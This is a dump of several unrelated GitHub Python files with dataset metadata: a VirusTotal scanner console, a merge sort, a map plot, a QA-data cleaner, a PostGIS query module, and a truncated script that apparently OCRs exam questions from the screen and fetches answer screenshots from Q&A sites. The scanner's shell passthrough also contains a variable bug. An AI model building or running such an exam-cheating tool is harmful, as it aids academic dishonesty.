'info'\\033[00m\")\n else:\n if shlex_console[1] ==\"filename\" or shlex_console[1] ==\"FILENAME\":\n value_filename = shlex_console[2]\n check_value = os.path.exists(value_filename)\n if check_value ==True:\n print(\"\\033[32m[\\033[34m*\\033[32m] %s Found !\\033[00m\" % (value_filename))\n FILENAME = value_filename\n print(\"\\033[32m[\\033[34m*\\033[32m] FILENAME => %s \\033[00m\" % (FILENAME))\n else:\n print(\"\\033[38;5;160m[!] Error %s Not Found !\\033[00m\" % (value_filename))\n \n elif console_xsearch_sh.startswith(\"run\")==True:\n if FILENAME ==None:\n print(\"\\033[38;5;160m[!] Error FILENAME => None !\\033[00m\")\n else:\n print(\"\\033[32m[\\033[34m*\\033[32m] if you don't have a key you can create one from this link\\nLink=> \\033[34mhttps://developers.virustotal.com/v3.0/reference\\033[00m\")\n api_key = str(input(\"\\033[00m[\\033[38;5;160m%s\\033[00m:Enter Virustotal API Key \\033[38;5;160m>> \" % (t)))\n hash_file = sha256sum_bin(FILENAME)\n send_requests_api(api_key,hash_file)\n\n else:\n print(\"\\033[38;5;160m[!] Error Command Not Found !\")\n\n except KeyboardInterrupt:\n print(\"\\033[38;5;160m[!] Error CTRl+C\")\n \n elif console ==\"xsearch_uu\":\n URL = \"None\"\n while True:\n try:\n t = datetime.now().strftime(\"%H:%M:%S\")\n console_xsearch_uu = str(input(\"\\033[00m[\\033[38;5;160m%s\\033[00m:Malware@Xsearch_search_url] \\033[38;5;160m>> \" % (t)))\n shlex_console = shlex.split(console_xsearch_uu)\n \n if console_xsearch_uu ==\"exit\" or console_xsearch_uu ==\"quit\":\n sys.exit()\n \n elif console_xsearch_uu ==\"back\" or console_xsearch_uu ==\"b\":\n break\n\n elif console_xsearch_uu.startswith(\"!\")==True:\n os.system(console_xsearch_sh[1:])\n \n elif console_xsearch_uu ==\"help\" or console_xsearch_uu ==\"?\" or console_xsearch_uu ==\"h\":\n print(\"[ commands descriptions ]\")\n print(\"[ ---------- -------------- ]\")\n print(\"[ info show info module ]\")\n print(\"[ set FILENAME,etc... ]\")\n print(\"[ back Back To Main ]\")\n print(\"[ run Run Module ]\")\n print(\"\\n\")\n print(\"\\n\")\n \n elif console_xsearch_uu ==\"info\":\n print(\"[ NAME VALUE\")\n print(\"[ ---------- --------------\")\n print(\"[ URL %s\" % (URL))\n print(\"\\n\")\n\n elif console_xsearch_uu.startswith(\"set\")==True:\n shlex_console = shlex.split(console_xsearch_uu)\n if len(shlex_console) <3:\n print(\"\\033[38;5;160m[!] Error usage : exemple : set URL for show options type 'info'\\033[00m\")\n else:\n if shlex_console[1] ==\"url\" or shlex_console[1] ==\"URL\":\n value_url = shlex_console[2]\n print(\"\\033[32m[\\033[34m*\\033[32m] %s Found !\\033[00m\" % (value_url))\n URL = value_url\n print(\"\\033[32m[\\033[34m*\\033[32m] URL => %s \\033[00m\" % (URL))\n else:\n print(\"\\033[38;5;160m[!] Error Options !\")\n \n elif console_xsearch_uu.startswith(\"run\")==True:\n if URL ==None:\n print(\"\\033[38;5;160m[!] Error URL => None !\\033[00m\")\n else:\n print(\"\\033[32m[\\033[34m*\\033[32m] if you don't have a key you can create one from this link\\nLink=> \\033[34mhttps://developers.virustotal.com/v3.0/reference\\033[00m\")\n api_key = str(input(\"\\033[00m[\\033[38;5;160m%s\\033[00m:Enter Virustotal API Key \\033[38;5;160m>> \" % (t)))\n send_url_api(api_key,URL)\n\n else:\n print(\"\\033[38;5;160m[!] Error Command Not Found !\")\n\n except KeyboardInterrupt:\n print(\"\\033[38;5;160m[!] Error CTRl+C\")\n \n elif console ==\"banner\":\n print(banner)\n\n else:\n print(\"\\033[38;5;160m[!] Error Command Not Found !\")\n\n except KeyboardInterrupt:\n print(\"[!] Error CTRL+C\")\n","repo_name":"HiFeV/Train-2018-2020","sub_path":"Mscan/malware_scan.py","file_name":"malware_scan.py","file_ext":"py","file_size_in_byte":27343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18632651729","text":"\ndef merge_sort(arr, n) :\n \n if n < 2 :\n return\n \n mid = int(n / 2)\n left = [None] * mid\n right = [None] * (n-mid)\n\n for i in range(0, mid) :\n left[i] = arr[i]\n i = i + 1\n \n for i in range(mid, n) :\n right[i-mid] = arr[i]\n i = i + n\n\n merge_sort(left, mid)\n merge_sort(right, n - mid)\n \n merge(arr, left, right, mid, n - mid)\n\n\ndef merge(arr, left, right, leftSize, rightSize) :\n\n i = 0\n j = 0\n k = 0\n\n while i < leftSize and j < rightSize :\n\n if left[i] <= right[j] :\n arr[k] = left[i]\n i = i + 1\n else :\n arr[k] = right[j]\n j = j + 1\n\n k = k + 1\n \n while i < leftSize :\n arr[k] = left[i]\n i = i + 1\n k = k + 1\n \n while j < rightSize :\n arr[k] = right[j]\n j = j + 1\n k = k + 1\n\n\narray = [34, 23, 22, 89, 76, 54, 91, 8, 45, 17]\n\nprint (array)\n\nmerge_sort(array, len(array))\n\nprint (array)","repo_name":"albertolop85/python-examples","sub_path":"mergesort.py","file_name":"mergesort.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43363825772","text":"from mpl_toolkits.basemap import Basemap\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport os\nfrom matplotlib.patches import Polygon\n\ncmap = sns.cubehelix_palette(as_cmap=True)\ncmap = sns.diverging_palette(240, 10, n=6, as_cmap=True)\n\nsave_dest = 'figures'\nos.system('mkdir -p {}'.format(save_dest))\ndf = pd.read_csv(\"data/fucks_to_give_geo_raw.csv\")#.set_index('full_name')\ndf['state'] = df.full_name.str.split(', ').apply(lambda x:x[-1])\nmean = df['keyword'].sum()/float(df['_all'].sum())\n\ndfx = pd.DataFrame()\ndfx['_all'] = df.groupby(\"state\")['_all'].sum()\ndfx['keyword'] = df.groupby(\"state\")['keyword'].sum()\ndfx['average'] = dfx.keyword/dfx._all.astype(float)\ndfx['delta'] = dfx.average - mean\ndfx['frac'] = dfx.average / mean\ndfx = dfx.sort_values('delta')\n\ndfx.to_csv(\"data/fucks_to_give_geo_state.csv\")\n\n# Lambert Conformal map of lower 48 states.\nresolution = ['c','l','i','h','f'][2] # Higher is better but takes longer\n\nm = Basemap(\n llcrnrlon=-119,\n llcrnrlat=22,\n urcrnrlon=-64,\n urcrnrlat=49,\n projection='lcc',lat_1=33,lat_2=45,lon_0=-95,\n resolution = resolution,\n area_thresh=1000,\n)\n\n\nshort_state_names = {\n 'AK': 'Alaska',\n 'AL': 'Alabama',\n 'AR': 'Arkansas',\n 'AS': 'American Samoa',\n 'AZ': 'Arizona',\n 'CA': 'California',\n 'CO': 'Colorado',\n 'CT': 'Connecticut',\n 'DC': 'District of Columbia',\n 'DE': 'Delaware',\n 'FL': 'Florida',\n 'GA': 'Georgia',\n 'GU': 'Guam',\n 'HI': 'Hawaii',\n 'IA': 'Iowa',\n 'ID': 'Idaho',\n 'IL': 'Illinois',\n 'IN': 'Indiana',\n 'KS': 'Kansas',\n 'KY': 'Kentucky',\n 'LA': 'Louisiana',\n 'MA': 'Massachusetts',\n 'MD': 'Maryland',\n 'ME': 'Maine',\n 'MI': 'Michigan',\n 'MN': 'Minnesota',\n 'MO': 'Missouri',\n 'MP': 'Northern Mariana Islands',\n 'MS': 'Mississippi',\n 'MT': 'Montana',\n 'NA': 'National',\n 'NC': 'North Carolina',\n 'ND': 'North Dakota',\n 'NE': 'Nebraska',\n 'NH': 'New Hampshire',\n 'NJ': 'New Jersey',\n 'NM': 'New Mexico',\n 'NV': 'Nevada',\n 'NY': 'New York',\n 'OH': 'Ohio',\n 'OK': 'Oklahoma',\n 'OR': 'Oregon',\n 'PA': 'Pennsylvania',\n 'PR': 'Puerto Rico',\n 'RI': 'Rhode Island',\n 'SC': 'South Carolina',\n 'SD': 'South Dakota',\n 'TN': 'Tennessee',\n 'TX': 'Texas',\n 'UT': 'Utah',\n 'VA': 'Virginia',\n 'VI': 'Virgin Islands',\n 'VT': 'Vermont',\n 'WA': 'Washington',\n 'WI': 'Wisconsin',\n 'WV': 'West Virginia',\n 'WY': 'Wyoming'\n}\nshort_state_names_inv = {v: k for k, v in short_state_names.iteritems()}\n\nm.readshapefile('src/state_maps/st99_d00',\n name='states', drawbounds=False)\n\nstate_names = []\nfor shape_dict in m.states_info:\n abbr = short_state_names_inv[shape_dict[\"NAME\"]]\n state_names.append(abbr)\nstate_names = pd.DataFrame(state_names,columns=['ABBR'])\n\n\ndef draw_map_background(m, ax):\n lw = 0.25\n ax.set_facecolor('#DDEAF0')\n m.fillcontinents(color='#FAFAFA', ax=ax, zorder=0)\n m.drawstates(ax=ax,linewidth=lw)\n m.drawcountries(ax=ax,linewidth=lw)\n m.drawcoastlines(ax=ax,linewidth=lw)\n\nfig = plt.figure(figsize=(10,7))\nax = fig.add_subplot(111)\n\n\nvmax = 1.5\nvmin = 0.5\n\nfor abbr in dfx.index:\n idx = state_names.ABBR==abbr\n avg = dfx.ix[abbr, 'frac']\n\n color = cmap((np.clip(avg, vmin, vmax)-vmin) / (vmax-vmin))\n\n for i in np.where(idx)[0]:\n\n seg = m.states[i]\n poly = Polygon(seg, facecolor=color,edgecolor=None)\n ax.add_patch(poly)\n\ndraw_map_background(m, ax)\n\ntext = \"National fucks given on a state level\"\nplt.title(text, fontsize=18)\n\nplt.scatter([0,0],[0,0],c=[vmin,vmax],\n s=0,vmax=vmax,vmin=vmin,cmap=cmap)\ncbar = plt.colorbar(fraction=0.03)\n\ntext = 'Fucks given per US baseline of {:d}/1000 tweets'.format(int(mean*1000))\ncbar.ax.set_ylabel(text, rotation=90)\n\n\nplt.tight_layout()\nplt.savefig(os.path.join(save_dest,\"fucks_given_national.png\"))\nplt.show()\n\n\n","repo_name":"thoppe/twitterf_cks","sub_path":"src/plot_states.py","file_name":"plot_states.py","file_ext":"py","file_size_in_byte":4179,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"31003595817","text":"import json\nimport spacy\nfrom nltk.tokenize import sent_tokenize\nfrom tqdm import tqdm\nfrom collections import defaultdict\n\nnlp = spacy.load(\"en_core_web_sm\")\n\n\nif __name__ == \"__main__\":\n\n input_data_path = \"/Users/ra-mit/development/fabric/dev-v1.1.json\"\n output_data_path = \"/Users/ra-mit/development/fabric/dev-v1.1-edit.json\"\n\n total = 0\n total_broken = 0\n gt_questions = 0\n edit_questions = 0\n no_choices = 0\n\n with open(input_data_path) as f:\n gt = json.load(f)\n training_data = [] # list of \n pos_labels = 0\n neg_labels = 0\n dataset = gt['data']\n for article in tqdm(dataset):\n for paragraph in article['paragraphs']:\n paragraph_text = paragraph['context']\n paragraph_sentences = sent_tokenize(paragraph_text)\n sentence_offset = []\n soffset = 0\n for s in paragraph_sentences:\n slen = len(s)\n e = (s, soffset + slen)\n soffset += slen\n sentence_offset.append(e)\n for qa in paragraph['qas']:\n question = qa['question']\n gt_questions += 1\n indices = defaultdict(int)\n\n for a in qa['answers']:\n indices[a['answer_start']] += 1\n # only if there is more than one possible index\n if len(indices.keys()) > 1:\n\n no_choice = True\n for a in qa['answers']:\n a_text = a['text']\n a_analyzed = nlp(a_text)\n if len(a_analyzed) > 1:\n no_choice = False\n elif len(a_analyzed) == 1 and len(a_analyzed[0]) >= 4:\n no_choice = False\n elif not a_analyzed[0].is_digit:\n no_choice = False\n if no_choice:\n print(\"Q: \" + str(question))\n print(\"A: \" + str(qa['answers']))\n no_choices += 1\n\n print(\"total: \" + str(total))\n print(\"total-br: \" + str(total_broken))\n print(\"no choices: \" + str(no_choices))\n","repo_name":"raulcf/fabric-snapshot","sub_path":"qa_engine/answer_verifier/clean_ground_truth.py","file_name":"clean_ground_truth.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"8916323243","text":"# -*- coding: utf-8 -*-\nimport os\nimport json\nimport psycopg2\nfrom psycopg2.extras import RealDictCursor\n\n\ndef get_conn():\n conn = psycopg2.connect(\n dbname=os.getenv('DB_NAME', 'beer'),\n user=os.getenv('DB_USER', 'atlefren'),\n password=os.getenv('DB_PASS', 'atlefren'),\n host=os.getenv('DB_HOST', 'localhost')\n )\n conn.cursor_factory = RealDictCursor\n return conn\n\ncolumn_list = {\n 'pol': ['apn_tirsdag', 'apn_torsdag', 'butikknavn',\n 'kategori', 'gate_poststed', 'post_postnummer',\n 'gate_postnummer', 'apn_onsdag', 'apn_lordag',\n 'gateadresse', 'postadresse', 'post_poststed', 'apn_fredag',\n 'apn_mandag'],\n 'breweries': ['website', 'name', 'street', 'address',\n 'comment', 'phone', 'org_desc'],\n 'pubs': ['name'],\n 'hex': []\n}\n\n\ndef db_save_brewery(feature):\n properties = feature['properties']\n\n feature['geometry']['coordinates'].append(0.0)\n properties['geom'] = json.dumps(feature['geometry'])\n\n insert_sql = '''\n INSERT INTO breweries (name, active, has_serving, has_shop, type, website, street, address, comment, wkb_geometry)\n VALUES (%(name)s, %(active)s, %(has_serving)s, %(has_shop)s, %(type)s, %(website)s, %(street)s, %(address)s, %(comment)s, ST_SetSRID(ST_GeomFromGeoJSON(%(geom)s), 4326))\n '''\n\n conn = get_conn()\n cursor = conn.cursor()\n\n cursor.execute(insert_sql, properties)\n conn.commit()\n cursor.close()\n conn.close()\n return feature\n\n\ndef create_featurecollection(features):\n return {\n 'type': 'FeatureCollection',\n 'features': features\n }\n\n\ndef parse_row(row):\n\n geom = json.loads(row.pop('geom'))\n return {\n 'type': 'Feature',\n 'geometry': geom,\n 'properties': row\n }\n\n\ndef get_feature(table, id):\n conn = get_conn()\n cur = conn.cursor()\n\n sql = '''\n SELECT *, ST_AsGeoJSON(wkb_geometry) as geom, ogc_fid as id\n FROM {0}\n WHERE ogc_fid = {1:d}\n '''.format(table, id)\n cur.execute(sql)\n d = parse_row(cur.fetchone())\n cur.close()\n conn.close()\n return d\n\n\ndef get_table(table, columns):\n conn = get_conn()\n cur = conn.cursor()\n cols = ''\n if len(columns):\n cols = ', '.join(columns) + ','\n sql = '''\n SELECT {0} ST_AsGeoJSON(wkb_geometry) as geom, ogc_fid as id FROM {1}\n '''.format(cols, table)\n\n cur.execute(sql)\n features = [parse_row(row) for row in cur.fetchall()]\n cur.close()\n conn.close()\n return {\n 'type': 'FeatureCollection',\n 'features': features\n }\n\n\ndef get_data(table):\n return get_table(table, column_list[table])\n\n\ndef get_breweries():\n return get_data('breweries')\n\n\ndef get_pol():\n return get_data('pol')\n\n\ndef get_pubs():\n return get_data('pubs')\n\n\ndef get_ten_closest(table, lat, lon):\n conn = get_conn()\n columns = column_list[table]\n\n cur = conn.cursor()\n sql = '''\n SELECT\n {0},\n ST_AsGeoJSON(wkb_geometry) as geom,\n ST_Distance(st_setsrid(st_makepoint({1:f}, {2:f}), 4326)::geography,\n wkb_geometry::geography) / 1000 as distance,\n ogc_fid as id\n FROM\n {3}\n ORDER BY\n distance\n LIMIT 10\n '''.format(','.join(columns), lon, lat, table)\n\n cur.execute(sql)\n\n features = [parse_row(row) for row in cur.fetchall()]\n cur.close()\n conn.close()\n return {\n 'type': 'FeatureCollection',\n 'features': features\n }\n\n\ndef group_by_kommune(table):\n conn = get_conn()\n cur = conn.cursor()\n sql = '''\n SELECT kommuner.navn, kommuner.komm, count(*) AS num, p.population as population\n FROM kommuner, {0}, population p\n WHERE st_intersects(kommuner.wkb_geometry, {0}.wkb_geometry)\n AND kommuner.komm = p.komm\n GROUP BY kommuner.komm, kommuner.navn, population\n order by num DESC'''.format(table)\n\n cur.execute(sql)\n\n res = cur.fetchall()\n cur.close()\n conn.close()\n return res\n\n\ndef get_hex(table):\n conn = get_conn()\n cur = conn.cursor()\n sql = '''\n SELECT\n ST_AsGeoJSON(hex.wkb_geometry) as geom,\n COUNT({0}.ogc_fid) AS count\n FROM hex\n LEFT JOIN {0} ON st_contains(hex.wkb_geometry, {0}.wkb_geometry)\n GROUP BY hex.wkb_geometry\n ORDER BY count DESC\n '''.format(table)\n cur.execute(sql)\n\n features = [parse_row(row) for row in cur.fetchall()]\n cur.close()\n conn.close()\n return {\n 'type': 'FeatureCollection',\n 'features': features\n }\n\n\ndef get_kommune_stats():\n return {\n 'pol': group_by_kommune('pol'),\n 'pubs': group_by_kommune('pubs'),\n 'breweries': group_by_kommune('breweries'),\n 'hex': {\n 'pol': get_hex('pol'),\n 'pubs': get_hex('pubs'),\n 'breweries': get_hex('breweries')\n }\n }\n\n\ndef get_nearby_db(lat, lon):\n return {\n 'pol': get_ten_closest('pol', lat, lon),\n 'pubs': get_ten_closest('pubs', lat, lon),\n 'breweries': get_ten_closest('breweries', lat, lon),\n }\n","repo_name":"atlefren/beermap","sub_path":"beermap/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":5136,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"17919000101","text":"import cv2\nimport datetime\nimport re\nimport struct\nimport os\nimport csv\nimport random\nimport pyautogui as pa\nimport pytesseract\nimport pyscreenshot as ps\nfrom googlesearch import search\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nimport matplotlib.pyplot as plt\n\ndef wiredFileTransfer(filenames, device_path):\n for filename in filenames:\n os.rename(filename, os.path.join(device_path, os.path.basename(filename)))\n print('Done')\n\n\ndef ServerFileUpload(filenames):\n prev_files = os.listdir('static/exam_cheater')\n for file in prev_files:\n os.remove(os.path.join('static/exam_cheater', file))\n for filename in filenames:\n os.rename(filename, os.path.join('static/exam_cheater',os.path.basename(filename)))\n\ndef create_quick_subplots(filenames):\n row=1\n col =len(filenames)\n for i in range(len(1, filenames)):\n if (len(filenames)%i) == 0:\n if len(filenames)/i < col:\n row = i\n col = len(filenames)/i\n fig, axs = plt.subplots(row,col,figsize=(5,5))\n index = 0\n for r in range(row):\n for c in range(col):\n im = cv2.imread(filenames[index])\n axs[r][c].imshow(im)\n index += 1\n plt.show()\n\n \ndef webSearchExam(query):\n chrome_options = Options()\n chrome_options.add_argument(\"--headless\")\n chrome_options.add_argument(\"--no-sandbox\")\n chrome_options.add_argument('--disable-dev-shm-usage')\n driver = webdriver.Chrome(chrome_options=chrome_options, executable_path='./chromedriver')\n\n searches = list(search(query, tld = \"com\", num = 10, stop =10, pause =2))\n # print(searches)\n pattern = re.compile(r'(http|https)?(://)(www\\.)?(stackoverflow|quora|geeksforgeeks|answers|stackexchange)(\\.\\w{2,4})(.*)')\n matches = list(filter(pattern.match, searches))\n filenames=[]\n # print(matches)\n for index in range(len(matches)):\n match = matches[index]\n print(match)\n driver.get(match)\n website_name = re.compile(r'(http|https)?(://)(www\\.)?(\\w+)(\\.\\w{2,4})/([\\w*|\\d*-]+)/?').findall(match)\n file_name= 'temp/{}-{}_{}.png'.format(website_name[0][3], website_name[0][5], str(index))\n filenames.append(file_name)\n print('filename: {}'.format(file_name))\n driver.get_screenshot_as_file(file_name)\n return filenames\n\n\ndef webSearchPersonal(query):\n chrome_options = Options()\n chrome_options.add_argument(\"--window-size=1920x1080\")\n chrome_options.add_argument(\"--no-sandbox\")\n chrome_options.add_argument('--disable-dev-shm-usage')\n\n driver = webdriver.Chrome(chrome_options=chrome_options, executable_path='./chromedriver')\n searches = list(search(query, tld = \"com\", num = 10, stop =10, pause =2))\n # print(searches)\n pattern = re.compile(r'(http|https)?(://)(www\\.)?(medium|towardsdatascience|wikipedia|youtube|stackoverflow|quora|geeksforgeeks|answers|stackexchange)(\\.\\w{2,4})(.*)')\n matches = list(filter(pattern.match, searches))\n driver.get(matches[0])\n for index in range(1,len(matches)):\n match = matches[index]\n driver.execute_script('''window.open(\"{}\",\"_blank\");'''.format(match))\n\ndef OCR(orig_filename):\n im = cv2.imread(orig_filename)\n gray = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)\n\n filename = \"{}.png\".format(os.getpid())\n cv2.imwrite(filename, gray)\n\n text = ' '.join(pytesseract.image_to_string(gray).split('\\n'))\n os.remove(filename)\n return text\n\ndef execute_cliper():\n x1,y1= pa.position()\n code = 1\n event = in_file.read(EVENT_SIZE)\n while code != 45:\n (_,_,type, code, value) = struct.unpack(FORMAT, event)\n event = in_file.read(EVENT_SIZE)\n x2,y2 = pa.position()\n im = ps.grab(bbox=(min(x1,x2),min(y1,y2),max(x1,x2),max(y1,y2)))\n # if x1